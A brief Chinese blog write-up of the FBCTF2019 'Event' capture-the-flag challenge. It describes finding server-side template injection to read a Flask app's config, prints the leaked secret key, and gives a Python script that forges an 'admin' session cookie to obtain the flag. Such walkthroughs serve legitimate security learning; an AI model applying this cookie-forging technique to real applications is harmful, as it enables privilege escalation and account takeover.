[FBCTF2019]Event

/ 0评 / 0

[FBCTF2019]Event

打开后有登录


登录后有相关功能和cookie中的jwt
解密发现

十六进制转字符发现是类似于base的字符串
DjAIokH7oQUv2ZV/J5xBZu28tpigqMP48g3GOkEKnmrqfsJLElT5FLtZFXvE82IHutAdPlPe0tk+mPow5fCX9w==
但是解不出来。先找key吧
fuzz后发现

在important中可以进行ssti
尝试读取config

找到key
fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y
一个jwt不知道怎么用,另一个user处的cookie不知道啥意思
看了眼wp,是用user处,但是需要在自己写flask生成

from flask import Flask
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)
@app.route('/')
def index():
    print(session_serializer.dumps("admin"))
index()

生成后替换cookie,拿到flag

 

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注